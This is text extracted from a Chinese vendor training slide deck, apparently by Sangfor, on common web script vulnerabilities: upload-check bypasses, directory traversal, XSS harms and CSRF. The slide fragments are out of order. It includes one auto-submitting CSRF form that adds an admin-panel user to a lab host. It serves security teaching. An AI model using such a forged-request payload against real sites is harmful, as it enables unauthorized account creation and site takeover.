Web脚本漏洞攻击技术
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
基础知识学习
WEB服务器常见脚本漏洞类型
WEB服务器常见脚本漏洞类型
认识常见的web脚本层漏洞 – 上传漏洞
上传功能
认识常见的web脚本层漏洞 – 上传漏洞
客户端检测机制(javascript)
上传漏洞
服务端检测机制(MIME类) 服务端检测机制(目录路径) 服务端检测机制(文件扩展名) 服务端检测机制(文件内容检测)
服务端(目录路径检查)
认识常见的web脚本层漏洞 – 上传漏洞
服务端(文件扩展名检查)
认识常见的web脚本层漏洞 – 上传漏洞
服务端(文件内容检查)
认识常见的web脚本层漏洞 – 上传漏洞
服务端(文件内容检查)
认识常见的web脚本层漏洞 – 上传漏洞
服务端(文件内容检查)
认识常见的web脚本层漏洞 – 目录穿越漏洞
网站挂马:跨站时利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向 到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。
身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS可以盗取 到用户的Cookie,从而利用该Cookie盗取用户对该网站的操作权限。如 果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。
Web脚本漏洞攻击分析技术
深信服科技-熊耀富
SANGFOR Inc. 售前咨询:400-806-6868
B/S架构业务系统安全漏洞一览
Web服务器漏洞产生原因
网站开发语言
PHP网站:LINUX(WIN*)+APACHE+MYSQL+PHP ASP(.Net)网站:WINDOWS+IIS+ACCESS(MSSQL)+ASP(.NET、C#) JSP网站:LINUX(UNINX)+TOMCAT+MYSQL(ORACLE)+JSP
盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份使, 攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。
垃圾信息发送:比如在SNS社区中,利用XSS漏洞借用被攻击者的身份发 送大量的垃圾信息给特定的目标群。
劫持用户Web行为:一些高级的XSS攻击甚至可以劫持用户的Web行为, 监视用户的浏览历史,发送与接收的数据等等。
更多漏洞信息, 可参考资料
SQL注入学习:
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
XSS跨站脚本漏洞学习:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet http://www.comp.nus.edu.sg/~prateeks/papers/empirical-webfwks.pdf
这是需要从内存当中读取文件,通过fread()函数完成该动作需要注意的。 演示站点:http://172.16.183.136/test/download_vul/index.html
认识常见的web脚本层漏洞 - XSS跨站脚本漏洞
这些常用功能都可能存பைடு நூலகம்这种漏洞!! 搜索框 留言板
富文本框
认识常见的web脚本层漏洞 – XSS跨站脚本漏洞
下载功能
认识常见的web脚本层漏洞 – 目录穿越漏洞
下载功能
Web服务器上的 下载资源存放在 哪?
Web服务器
PC-1
网站下载功能
认识常见的web脚本层漏洞 – 目录穿越漏洞
下载功能实现原理 方法一 方法二
方法三
认识常见的web脚本层漏洞 - 目录穿越漏洞
下载功能实现原理
运行down.php文件,运行该文件的时候,必然要把将要被下载的文件读 入内存当中,这里通过fopen()函数完成该动作,现在文件已经在内存当中了,
PC-1
文件上传过程-安全检测机制
Web服务器
认识常见的web脚本层漏洞 – 上传漏洞
客户端(javascript检查)
认识常见的web脚本层漏洞 – 上传漏洞
客户端(javascript检查)
认识常见的web脚本层漏洞 – 上传漏洞
服务端(MIME检查)
认识常见的web脚本层漏洞 – 上传漏洞
认识常见的web脚本层漏洞 – CSRF漏洞
认识常见的web脚本层漏洞 – CSRF漏洞
认识常见的web脚本层漏洞 – CSRF漏洞
<form action="http://172.16.183.136:81/admin/KS.User.asp" method="post"> <input type=hidden name=GroupID value=2> <input type=hidden name=locked value=0> <input type=hidden name=UserName value=piaox1> <input type=hidden name=Email value=test@qq.com> <input type=hidden name=Password value=sangfor> <input type=hidden name=PwdConfirm value=sangfor> <input type=hidden name=Question value=我的宠物名字?> <input type=hidden name=Answer value=test> <input type=hidden name=ChargeType value=1> <input type=hidden name=RealName value=""> <input type=hidden name=HomeTel value=1234> <input type=hidden name=Province value=广东省> <input type=hidden name=City value=清远市> <input type=hidden name=HomePage value=""> <input type=hidden name=Action value=SaveAdd> <input type=submit name=Submit value=确定添加> </form> <script> document.forms[0].submit(); </script>
XSS跨站脚本漏洞
认识常见的web脚本层漏洞 – XSS跨站脚本漏洞
XSS跨站脚本漏洞
认识常见的web脚本层漏洞 – XSS跨站脚本漏洞
XSS跨站脚本漏洞危害
钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网 站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输 入,甚至发起基于DHTML更高级的钓鱼攻击方式。
CSRF(Cross-site request forgery跨站请求伪造,也被称为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意 利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎 相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来 利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防 范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
上传漏洞学习:
http://www.owasp.org.cn/OWASP_Training/Upload_Attack_Framework.pdf OWASP TOP 10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
XSS蠕虫:XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上
数据、实施DDoS攻击等。
认识常见的web脚本层漏洞 – XSS跨站脚本漏洞
XSS跨站脚本漏洞危害演示 – 身份盗用
认识常见的web脚本层漏洞
XSS跨站脚本漏洞危害演示 – 网站挂马
认识常见的web脚本层漏洞 – CSRF漏洞